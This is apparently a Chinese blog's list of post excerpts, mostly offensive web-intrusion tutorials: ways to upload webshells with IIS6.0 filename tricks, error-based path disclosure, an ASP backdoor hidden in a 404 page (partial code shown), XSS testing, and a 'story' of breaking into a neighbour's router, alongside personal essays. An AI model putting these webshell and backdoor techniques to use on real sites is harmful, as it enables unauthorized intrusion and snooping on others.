大型目标渗透-入侵信息搜集 96 views

在入侵渗透一个大型目标网络时我一般分为4个大步骤,信息搜集-扫描查点-攻击获取权限—清除日志 我看了很多网上的文章或者视频做的都不是太系统。也不太详细。所以我打算做一个系列系统的教程。此次我打算把每个步骤详细的做一次梳理与总结方便想要学习网络安全技术的同学。 什么是信息收集 收集目标的情报信息是一个非常重要的环节。可以大大提高渗透测试的成功性。收集渗透目标情报一般是对目标系统的分析,扫描探测,服务查点,查找对方系统IP等,社会工程学在渗透测试中也非常有。渗透测试者会尽力搜集目标系统的配置,whois,主机ip段,公司人员,安全防御以及防火墙等信息。 00x1...

阅读全文>>

I say hey,平凡的一天 27 views

这年头,大部分人日子都过得特别急,一天二十四小时对你来说明显不够,你忙得自己的喜好都没空顾及。为了节省时间,你可能都依着别人的喜好点头摇头,看起来无比正经,不会犯错,也不用有趣。 有时候演自己都演得太深刻了,好像不融入集体焦虑就被落下一样,好像不跟着段子手留下一串哈哈哈哈就跟特么的被孤冷了似的,跟着别人预设好的节奏摇头晃脑,好过无人应和评论点赞。 好吧,我只是作为一个老派ROCKER,不想承认罢了,而且我,一点都不着急。那么多人把儿童节都当做群体狂欢的刷屏游戏乐此不疲的时候,我选择坐下来,坐下来回忆,坐下来深呼吸,顺便把又着急又嘈杂的世界给屏蔽掉,顺便享受那些把我当...

阅读全文>>

常见获取WEBSHELL方法 39 views

1.直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就加个空格或是利用IIS6.0解析漏洞,常见格式:1.asp;1.jpg 或 1.asp;.jpg 或 1.asp;jpg 2.有时上传图片格式的木马,居然被程序检测拦截了,右键记事本打开木马,在代码最前面加上gif89a,再数据库备份备份成asp格式的木马拿下shell。 3.上传图片格式木马,复制地址到数据库备份备份成asp格式木马,有时不成功的话,就利用IIs6.0解析漏洞,格式:1.asp; 或 1.asp;jpg 4.上传图片格式木马,用抓包工具进行抓包,抓到的信息里面包含...

阅读全文>>

PHP爆绝对路径常见方法 24 views

1、单引号爆路径 说明: 直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。 Eg: www.xxx.com/news.php?id=149' 2、错误参数值爆路径 说明: 将要提交的参数值改成错误值,比如-1。单引号被过滤时不妨试试。 Eg: www.xxx.com/researcharchive.php?id=-1 3、Google爆路径 说明: 结合关键字和site语法搜索出错页面的网页快照,常见关键字有warning和fatal error。注意,如果目标站点是二级域名,site接的是其对应的顶级域名,这样得到...

阅读全文>>

打造404错误页面隐藏后门 29 views

手把手打造一个404页面后门 作者:T0reAd 今天教大家打造一个隐蔽的404后门 我们先找一个404错误页面 把源码复制下来保存到本地asp格式 <% if request("77169")="77169" then %> <title>77169 </title> <%="<br>"%> <%="The file location:"+server.mappath(request.servervar...

阅读全文>>

黑客讲故事:攻下隔壁女生路由器后,我都做了些什么 53 views

其实这个问题可以理解为:蹭网之后,能做些什么? 不少人的八卦心窥探欲还是很强烈的,强烈到让人恐惧。所以很多人喜欢看一些八卦文章,比如:如何优雅的窥探别人? 通常这样的文章很容易火起来,因为不少人都喜欢看而且百看不厌。 最近路由安全沸沸扬扬,可以翻阅我微信公众号历史文章查看关于路由安全的文章以及央视当时的采访。鉴于天时地利人和,最后我成功的在现实生活中上演了这样一场精彩好戏,为了满足众人的欲望,我就写成故事。大家好好琢磨琢磨蹭网之后,我们还能做些什么? 声明: 这是一个虚构故事,图片均加万恶马赛克。 记忆中隔壁是一个还算不错的妹子,那天...

阅读全文>>

XSS漏洞挖掘与利用 76 views

XSS的检测 检测XSS一般分两种方法:一种是手工检测、一种是软件自动检测 手工检测:检测结果准确,但对于大型web来说费时费力 软件检测:方便省力,但存在误报,且有写隐蔽的XSS无法检测出 检测XSS最重要的就是考虑哪里有输入,输入的数据在哪里输出 1. 手工检测 可得知输出位置: • 输入敏感字符,如“<、>、"、'、()”等,然后在提交后查看html源代码,看这些字符是否被转义。 • 在输出这些字符时,程序可能已经进行了过滤,可以输入“AAAAAA<>"&'()”字符串,然后查找AAAAAA或许比较方便。 无法...

阅读全文>>

景色越辽阔,心里越寂寞 52 views

既然不快乐又不喜欢这里,不如一路向西去大理 多少人因为一句话而踏上旅途, 多少人因为一首歌而来到这个城市; 景色越辽阔,心里越寂寞; 希望那些温暖我的歌,现在亦能温暖你 这,是生命中的一天,寂寞而自由 是不是对生活不太满意 很久没有笑过又不知为何 既然不快乐又不喜欢这里 不如一路向西去大理 路程有点波折空气有点稀薄 景色越辽阔心里越寂寞 不知道谁在何处等待 ...

阅读全文>>